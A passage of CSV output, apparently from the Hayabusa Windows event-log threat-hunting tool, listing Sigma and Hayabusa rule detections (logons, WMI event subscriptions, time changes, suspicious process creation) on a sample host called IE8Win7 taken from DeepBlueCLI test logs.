.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 